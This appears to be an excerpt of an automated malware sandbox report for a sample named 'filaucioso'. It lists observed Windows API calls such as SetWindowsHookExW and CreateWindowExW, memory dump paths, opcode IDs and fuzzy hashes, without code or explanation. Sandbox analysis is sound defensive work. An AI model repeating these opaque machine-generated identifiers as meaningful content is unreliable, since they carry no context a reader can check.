                                                                        • Instruction Fuzzy Hash: B0E14E74A002189FDB06EBB8C890B9EBBF2EF8C301F108055E509A7755DB399D86DF65
                                                                        APIs
                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 366C2042
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3030111048.00000000366C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 366C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_366c0000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: CreateWindow
                                                                        • String ID:
                                                                        • API String ID: 716092398-0
                                                                        • Opcode ID: 627ae106cee9a1a6639e1c1262a629584c8820aa6c5b8fabd7b43ceddb19c63b
                                                                        • Instruction ID: 4615312458eca2e974e8c32ee22c6640538865d7249ea3745f5566d9ab418900
                                                                        • Opcode Fuzzy Hash: 627ae106cee9a1a6639e1c1262a629584c8820aa6c5b8fabd7b43ceddb19c63b
                                                                        • Instruction Fuzzy Hash: 9841C0B1D103499FDB14CFAAC884ADEBBB5FF88350F60812AE819AB210D7749845CF91
                                                                        APIs
                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 366C4741
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3030111048.00000000366C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 366C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_366c0000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: CallProcWindow
                                                                        • String ID:
                                                                        • API String ID: 2714655100-0
                                                                        • Opcode ID: 3acee1d24359919bc8272c4a875c4138c6b55cb73c171724a699f8ab2ee247c1
                                                                        • Instruction ID: f86c19a80afd967f4ec49d092fda123bbb94fbc37af784964ff5d3b9b9c4fa94
                                                                        • Opcode Fuzzy Hash: 3acee1d24359919bc8272c4a875c4138c6b55cb73c171724a699f8ab2ee247c1
                                                                        • Instruction Fuzzy Hash: 9B3138B8A00705CFDB04CF55C848AAABBF5FF89314F24C459D519AB321D774A841DFA1
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 000D73F7
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007505837.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_d0000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 69443ef910234a2a50508af2a7a59927e840b2819e48600e31f1b09c786accae
                                                                        • Instruction ID: 9db89f11c9522a78352fc4aa4713a95a2ed9d407dd98a9575ae7013ef33da0b7
                                                                        • Opcode Fuzzy Hash: 69443ef910234a2a50508af2a7a59927e840b2819e48600e31f1b09c786accae
                                                                        • Instruction Fuzzy Hash: 6921E4B5900348AFDB10CFAAD984ADEFFF4EB48320F14801AE918A3310D374A954CFA1
                                                                        APIs
                                                                        • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 000D22EB
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007505837.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_d0000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: HookWindows
                                                                        • String ID:
                                                                        • API String ID: 2559412058-0
                                                                        • Opcode ID: 1ef151b8dcadb0ed03be6020eac93f496cf837c35e34f2e78cfd4be5e5f792e4
                                                                        • Instruction ID: 4ebb442ab7c8fca04c953fdd18d8cefc6d513b8f4ad336c933f629cc9fdc6c68
                                                                        • Opcode Fuzzy Hash: 1ef151b8dcadb0ed03be6020eac93f496cf837c35e34f2e78cfd4be5e5f792e4
                                                                        • Instruction Fuzzy Hash: BB2104B5D002099FCB14DFA9C945BEEBBF5EF88310F10841AE459A7350CB74A945CFA1
                                                                        APIs
                                                                        • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 000D22EB
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007505837.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_d0000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: HookWindows
                                                                        • String ID:
                                                                        • API String ID: 2559412058-0
                                                                        • Opcode ID: 4343778bc61836833f1839cfaa38fa012ae70ed8b732af90158b9993c8d261a1
                                                                        • Instruction ID: f275b101ad41a5827b8e7bbe997142939acbcbaab25a7bde802d390be884ad79
                                                                        • Opcode Fuzzy Hash: 4343778bc61836833f1839cfaa38fa012ae70ed8b732af90158b9993c8d261a1
                                                                        • Instruction Fuzzy Hash: 0E2115B1D002099FCB14DFAAC944BEEFBF5EB88310F10841AE459A7350C774A944CFA1
                                                                        APIs
                                                                        • PeekMessageW.USER32(?,?,?,?,?), ref: 366C7540
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3030111048.00000000366C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 366C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_366c0000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePeek
                                                                        • String ID:
                                                                        • API String ID: 2222842502-0
                                                                        • Opcode ID: dc29e5d02f61a74776993c47e63289e1b66f2eef374d53fb7b82a79c2260dc69
                                                                        • Instruction ID: 71a2e43d798533afcd664618687dd012fbc6ea51f9bfa4e400baca5a61d5ad93
                                                                        • Opcode Fuzzy Hash: dc29e5d02f61a74776993c47e63289e1b66f2eef374d53fb7b82a79c2260dc69
                                                                        • Instruction Fuzzy Hash: 2D11F6B5C003499FDB10CF9AD944BDEBBF4EB48320F10842AE558A3250C378A554DFA5
                                                                        APIs
                                                                        • PeekMessageW.USER32(?,?,?,?,?), ref: 366C7540
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3030111048.00000000366C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 366C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_366c0000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePeek
                                                                        • String ID:
                                                                        • API String ID: 2222842502-0
                                                                        • Opcode ID: 5c38d75e1e3fd6655d54e5091c2a8b759c8a5b5b8f1fbe80fb5374c00db5bc26
                                                                        • Instruction ID: 80aac24fadeeb9f838bbea6302389082c061dc53dc1a2e9f4c1b9501d452985d
                                                                        • Opcode Fuzzy Hash: 5c38d75e1e3fd6655d54e5091c2a8b759c8a5b5b8f1fbe80fb5374c00db5bc26
                                                                        • Instruction Fuzzy Hash: FA11F3B5C00249DFDB10CF9AD944BEEBBF4EB48320F10842AE959A3250C378AA54DF65
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3030149887.0000000036840000.00000040.00000800.00020000.00000000.sdmp, Offset: 36840000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_36840000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Hbq
                                                                        • API String ID: 0-1245868
                                                                        • Opcode ID: 7a66788aecfe3800bbea0919cf744fb894c9d185913e6eac6a611bb2942821a1
                                                                        • Instruction ID: dfce91831660c455c074b1a404cecb0d4a5ad595397af07998ffed1a509ea79b
                                                                        • Opcode Fuzzy Hash: 7a66788aecfe3800bbea0919cf744fb894c9d185913e6eac6a611bb2942821a1
                                                                        • Instruction Fuzzy Hash: C5515871E01248DFDB04DFA9C990B9EBFB2BF49300F20816AE549AB395CB34AD05CB55
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3030149887.0000000036840000.00000040.00000800.00020000.00000000.sdmp, Offset: 36840000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_36840000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LR^q
                                                                        • API String ID: 0-2625958711
                                                                        • Opcode ID: bca306e43dadf883859b69c65db0f23477f8158cbdad084e591a24fd8e82db5b
                                                                        • Instruction ID: 59dde5a75e5ecfe673bf0ccb36321964357239c50ae2016d4ec6d6b7d2faee98
                                                                        • Opcode Fuzzy Hash: bca306e43dadf883859b69c65db0f23477f8158cbdad084e591a24fd8e82db5b
                                                                        • Instruction Fuzzy Hash: 9D318631B041198FDB1AEB35C4646AE77B6EF88704F20446DC446BB3A0DF359C46CB9A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3030149887.0000000036840000.00000040.00000800.00020000.00000000.sdmp, Offset: 36840000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_36840000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LR^q
                                                                        • API String ID: 0-2625958711
                                                                        • Opcode ID: f124a8f09fa9010b06792ef409748479fef1e3835e912c814133d2d09e33a05a
                                                                        • Instruction ID: b2daa731a67e0ea428774b8930ab94b425edb2ed27795508c65cb79471371a5f
                                                                        • Opcode Fuzzy Hash: f124a8f09fa9010b06792ef409748479fef1e3835e912c814133d2d09e33a05a
                                                                        • Instruction Fuzzy Hash: E4217434B041198FDB06EB79C4646AE77B6EF8C704F108468D406BB3A0DF359D06CB9A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3030149887.0000000036840000.00000040.00000800.00020000.00000000.sdmp, Offset: 36840000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_36840000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LR^q
                                                                        • API String ID: 0-2625958711
                                                                        • Opcode ID: 57f05490d0dd6b920d965ac61c05bba3fe950d86ec722c14ff4c86a12151b1fd
                                                                        • Instruction ID: e57a1a5ba5d5745f50020ad074c35ce81e02ac9633269370e04f209c4bde5511
                                                                        • Opcode Fuzzy Hash: 57f05490d0dd6b920d965ac61c05bba3fe950d86ec722c14ff4c86a12151b1fd
                                                                        • Instruction Fuzzy Hash: 99F0C870F5131D5FEB4AEB798C027AE77A5AB89700F50402CE585E7280EFA05E0247C7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3030149887.0000000036840000.00000040.00000800.00020000.00000000.sdmp, Offset: 36840000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_36840000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LR^q
                                                                        • API String ID: 0-2625958711
                                                                        • Opcode ID: cb947353e6b6fee7547f73604208f5e71d1c5759945e68d9207646e341e0167b
                                                                        • Instruction ID: 651054b26b20dd2fd617fc2fbd52f0d45c9def6950dbe12667d71caf1775f8d1
                                                                        • Opcode Fuzzy Hash: cb947353e6b6fee7547f73604208f5e71d1c5759945e68d9207646e341e0167b
                                                                        • Instruction Fuzzy Hash: 79F06870F0131D9FDB45EA69CD027AE77E5FB89700F10415DE549D7280EE605A0187C7
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3030149887.0000000036840000.00000040.00000800.00020000.00000000.sdmp, Offset: 36840000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_36840000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7591e667205984d5249979711c51ad9efa607f232a1e5148b493fe4983107e4c
                                                                        • Instruction ID: bb85dd285206cdf376047d5c9ce57c2a9182cb63ebebcbdef1aa1ff92fb61ee6
                                                                        • Opcode Fuzzy Hash: 7591e667205984d5249979711c51ad9efa607f232a1e5148b493fe4983107e4c
                                                                        • Instruction Fuzzy Hash: D7115735A081D88FC717DB69D46019EBBA9EF8E30072144CBC841AF296C6115C06CBE2
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3030149887.0000000036840000.00000040.00000800.00020000.00000000.sdmp, Offset: 36840000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_36840000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d855af81683831716940511f44f7bf2292bd3eb7ae55e43e36f9acf6df004b37
                                                                        • Instruction ID: 47a89ec367740c64e75dd6dab89cb4771375139d3458753a4dd6955b6ae18e51
                                                                        • Opcode Fuzzy Hash: d855af81683831716940511f44f7bf2292bd3eb7ae55e43e36f9acf6df004b37
                                                                        • Instruction Fuzzy Hash: 15B14870E0021D8FDB01DFAAC8817AEBFF2AF4D344F148129D959E7294EB749845CB81
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3030149887.0000000036840000.00000040.00000800.00020000.00000000.sdmp, Offset: 36840000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_36840000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c7010c54389f46a465c959019281aa74eb3241b16e9855aa31462d9917786bc5
                                                                        • Instruction ID: 77a287a57a0d676a13e9855fa52ab915be5f3e9c40ebce29f777b493fac8aed3
                                                                        • Opcode Fuzzy Hash: c7010c54389f46a465c959019281aa74eb3241b16e9855aa31462d9917786bc5
                                                                        • Instruction Fuzzy Hash: 2EB14BB4E1021DCFDB01DFAAD8817ADBFF1AF4C354F248529D854A7294EB749846CB81
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3030149887.0000000036840000.00000040.00000800.00020000.00000000.sdmp, Offset: 36840000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_36840000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bddd45b405e9daa01a2a398881e3dc344a634299d9c5489e0dcb963a7964a6d4
                                                                        • Instruction ID: 1758c071698828d909f5505a43978ae30e95170764ca5f561e30aca01f25fd3c
                                                                        • Opcode Fuzzy Hash: bddd45b405e9daa01a2a398881e3dc344a634299d9c5489e0dcb963a7964a6d4
                                                                        • Instruction Fuzzy Hash: 2151D271F016198FDB17AFB9C86116EBAB3AF89750F240A69C405AB391DF358D02C7D2
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3030149887.0000000036840000.00000040.00000800.00020000.00000000.sdmp, Offset: 36840000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_36840000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 95082f047b4ae116bddf23dec115956d94d316f3242a1bb4548764ffa6d9ebdf
                                                                        • Instruction ID: 707d4155d653369aec64a40a129da43cf58814f496cf5c44979b779e369fe13d
                                                                        • Opcode Fuzzy Hash: 95082f047b4ae116bddf23dec115956d94d316f3242a1bb4548764ffa6d9ebdf
                                                                        • Instruction Fuzzy Hash: 8A41EDB1D0125CDFDB14DFA9C984BDDBBF5AF48300F20802AE508AB354DB75A949CBA5
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007340132.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_9d000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e9be66c997fa82255032f0ba6b3b0ad38034d322b75b30389e2a2d22e7adc085
                                                                        • Instruction ID: f91324d06e6b1c851d1e32533f28bd0a3cdaa40a2fe885c85bc7c5bbb58ed691
                                                                        • Opcode Fuzzy Hash: e9be66c997fa82255032f0ba6b3b0ad38034d322b75b30389e2a2d22e7adc085
                                                                        • Instruction Fuzzy Hash: B2216A71544600DFCF15DF14D9C0B26BFA1FB98318F24C56ED90A0B246C336D856EBA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007396100.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_ad000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 22420750c6ce05828ac98fb7bd2d846b67d341196568c5a658716bf31727ee47
                                                                        • Instruction ID: 3478166e94994ffd63cefdd43991eddbde8c8509c4a0aa6e33260c459f6d4e63
                                                                        • Opcode Fuzzy Hash: 22420750c6ce05828ac98fb7bd2d846b67d341196568c5a658716bf31727ee47
                                                                        • Instruction Fuzzy Hash: D22134B1604200FFDB05DF54C9C4B26BBA1FB99324F24CA6ED90A4B742C33AD846CB61
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007396100.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_ad000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3ac8273e47a6b70519b93a8eb186440d3df2c64727565250b55c714702261d70
                                                                        • Instruction ID: 89b9a16d33b40511be8b9f7062c0f69359cb346c608bbd0e88ae2781a38dfc43
                                                                        • Opcode Fuzzy Hash: 3ac8273e47a6b70519b93a8eb186440d3df2c64727565250b55c714702261d70
                                                                        • Instruction Fuzzy Hash: 7621F2B1604300DFDB24DF64C9C4F26BBA5EB95314F24C66ED90A4B751C736D847C661
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3030149887.0000000036840000.00000040.00000800.00020000.00000000.sdmp, Offset: 36840000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_36840000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c78f4a06c9b418d2b6e07c36a3a2bb5fc392f69c5e10bd30a38b5443519eceaa
                                                                        • Instruction ID: 680b6436b1b024f97003b0fcdb0c82f0fefc218f42042fd2c93b33f882136421
                                                                        • Opcode Fuzzy Hash: c78f4a06c9b418d2b6e07c36a3a2bb5fc392f69c5e10bd30a38b5443519eceaa
                                                                        • Instruction Fuzzy Hash: A7212774A002199FDB05CFA5C980ADEFBB2FF88310F14C2A5D805AB344DB70AD86CB80
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3030149887.0000000036840000.00000040.00000800.00020000.00000000.sdmp, Offset: 36840000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_36840000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a731bcd4b3ca2e9d3c563331bdc90fd15760421de7032ed040ad7c8af637c634
                                                                        • Instruction ID: 9476c2ffcfaf93c2fb44ce6b275e1651d011a4fdb367d09840a668175b3702a1
                                                                        • Opcode Fuzzy Hash: a731bcd4b3ca2e9d3c563331bdc90fd15760421de7032ed040ad7c8af637c634
                                                                        • Instruction Fuzzy Hash: B7118C34F1022C8BEB09EA79C8106AF76E6EF88750F148539EA05AB350EB308D4087E4
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007340132.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_9d000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 02c8f471abccaf91c15cf15abd3099abb34928298146c0805963bab8260c3654
                                                                        • Instruction ID: 5a0f9e7d44b85fa1dfc57e7ef11f496321a99a0b27aa5e8dfa61c21d81e038e9
                                                                        • Opcode Fuzzy Hash: 02c8f471abccaf91c15cf15abd3099abb34928298146c0805963bab8260c3654
                                                                        • Instruction Fuzzy Hash: 5811E176544640CFCF12CF10D5C4B16BFB2FB94324F24C2AAD8090B256C33AD85ADBA2
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3030149887.0000000036840000.00000040.00000800.00020000.00000000.sdmp, Offset: 36840000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_36840000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7985d81a342d070f9f4c180b6bfba350d8ec4e61ee187cd24d1023138be87834
                                                                        • Instruction ID: c0839d1c777b7a6c73e5e9b4ffa2d8bb5c4ef4768554f86add20527b50838418
                                                                        • Opcode Fuzzy Hash: 7985d81a342d070f9f4c180b6bfba350d8ec4e61ee187cd24d1023138be87834
                                                                        • Instruction Fuzzy Hash: 361108706103289FDB05AB7C88153AE7FEAEB8C311F104129920DD3391DF7989429BD6
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007396100.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_ad000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 369630bcfbb8dc2354fa39a610b9a4a4152f78477c6cdd78f3ce479ca549ff51
                                                                        • Instruction ID: 7ef1caa545673a8e56dc6b15d094222304854ee63bf595edcb57e7f07d9027c6
                                                                        • Opcode Fuzzy Hash: 369630bcfbb8dc2354fa39a610b9a4a4152f78477c6cdd78f3ce479ca549ff51
                                                                        • Instruction Fuzzy Hash: BF11D075544240DFDB05CF50D9C4B15BFB1FB45324F24C6AED84A4B656C33AD84ACB51
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007396100.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_ad000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 593e3fadc8a9b434a25fe721b335825d0b0eb297d05d2dcf5cf62a09fb6b26b5
                                                                        • Instruction ID: e4a58dbaf000177a84ad73d595393fa38fa5eb877836e1f7cadb41898c94e291
                                                                        • Opcode Fuzzy Hash: 593e3fadc8a9b434a25fe721b335825d0b0eb297d05d2dcf5cf62a09fb6b26b5
                                                                        • Instruction Fuzzy Hash: 4511EF75604280CFCB11CF20C5C4B15BFA1FB85318F28C6AED84A4BA52C33AD84ACB92
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3030149887.0000000036840000.00000040.00000800.00020000.00000000.sdmp, Offset: 36840000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_36840000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e1f06b33b9f4d540c4824ebf40288376a4e961d859d37e767baca2ed0e683a65
                                                                        • Instruction ID: ae824a39f61ac94d10e96b3f5a4dd41a57dc1898a2a732c6ded7338e5a95a677
                                                                        • Opcode Fuzzy Hash: e1f06b33b9f4d540c4824ebf40288376a4e961d859d37e767baca2ed0e683a65
                                                                        • Instruction Fuzzy Hash: AA01AC75F0861846FB05E6B9CD105ED77F6EBC8350F004431DA05A7380DF35991486BA
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3030149887.0000000036840000.00000040.00000800.00020000.00000000.sdmp, Offset: 36840000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_36840000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c4e8059c6369691f519206875997ead860980c07264d47c1cf2a57de910b31b2
                                                                        • Instruction ID: 7d84fc4dfa785601ec253c82343c8a9302eaf7e869862a764daf696851d749e8
                                                                        • Opcode Fuzzy Hash: c4e8059c6369691f519206875997ead860980c07264d47c1cf2a57de910b31b2
                                                                        • Instruction Fuzzy Hash: 8601FD60A4E3898FC723EF7D88560AD7FF1AE4B35030889EAC084DF653DA300506CB52
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3030149887.0000000036840000.00000040.00000800.00020000.00000000.sdmp, Offset: 36840000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_36840000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b4cbd65b9b49e4612e9d2c0d6f92ca4639590912610256708b7bd8a8a3ca0184
                                                                        • Instruction ID: f6a651903ec932862017ee9b293426ddefc6ab74a62c115662a1bf8aba70ea11
                                                                        • Opcode Fuzzy Hash: b4cbd65b9b49e4612e9d2c0d6f92ca4639590912610256708b7bd8a8a3ca0184
                                                                        • Instruction Fuzzy Hash: 9BF0AF36B001299FCF149BA8D8514DEBBA5EF89300B00056AD542AB3A1DE386D05CB81
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3030149887.0000000036840000.00000040.00000800.00020000.00000000.sdmp, Offset: 36840000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_36840000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: eaf444336fe6298337053068743827e1a81bb2822b8b6066a3ae3a56c0965431
                                                                        • Instruction ID: 29abec5b991e39aee8045127aaced5c91e6cdedbb34941d2884229fe9ab3206a
                                                                        • Opcode Fuzzy Hash: eaf444336fe6298337053068743827e1a81bb2822b8b6066a3ae3a56c0965431
                                                                        • Instruction Fuzzy Hash: 53F0B4357000585BCB01E668E8105DF77EBDFCD710B1081A4D909B7344DF22AE12CBE6
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3030149887.0000000036840000.00000040.00000800.00020000.00000000.sdmp, Offset: 36840000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_36840000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 91047cc114c170715808213c0a65a1f15c895a646e6f18516ff6bc22525607ce
                                                                        • Instruction ID: 2902d2502aa5b603d287587d685bf45557aec723051485724a094291830e6789
                                                                        • Opcode Fuzzy Hash: 91047cc114c170715808213c0a65a1f15c895a646e6f18516ff6bc22525607ce
                                                                        • Instruction Fuzzy Hash: B4F0A032B001289FCB00AAB8DC158CE77A5EFC9351F4004B4D506EB364EF349D058BD1
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3030149887.0000000036840000.00000040.00000800.00020000.00000000.sdmp, Offset: 36840000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_36840000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a40f853832b43475c3c1a58dd4222e179683ac9c35592d8c6fa253f665e6267f
                                                                        • Instruction ID: 96fee8b94708f4aba2178962953147fd60f55b47f3b8145c69ab3dfd53952cda
                                                                        • Opcode Fuzzy Hash: a40f853832b43475c3c1a58dd4222e179683ac9c35592d8c6fa253f665e6267f
                                                                        • Instruction Fuzzy Hash: 24D0C9B0C1530C9F8B80EFBD990619EBBF4AA08300F4045AAC808E3201FB714A118FD1
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3030149887.0000000036840000.00000040.00000800.00020000.00000000.sdmp, Offset: 36840000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_36840000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d657b15720995dc8c561ff7aa74b4e92ab7782f123155772a933196d2db6d855
                                                                        • Instruction ID: f840c27de661e19ecb5d93001bff5ed04bcc7ef3fc8db2094d2f87fe6780e8b3
                                                                        • Opcode Fuzzy Hash: d657b15720995dc8c561ff7aa74b4e92ab7782f123155772a933196d2db6d855
                                                                        • Instruction Fuzzy Hash: 2CB01220F0070807EE0D37BA559C01E24C337C43253608C586086CF348CD3458008794
                                                                        APIs
                                                                          • Part of subcall function 00406385: GetModuleHandleA.KERNEL32(?,?,?,004032BB,0000000A), ref: 00406397
                                                                          • Part of subcall function 00406385: GetProcAddress.KERNEL32(00000000,?), ref: 004063B2
                                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032A6
                                                                        • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004032E2
                                                                        • OleInitialize.OLE32(00000000), ref: 004032E9
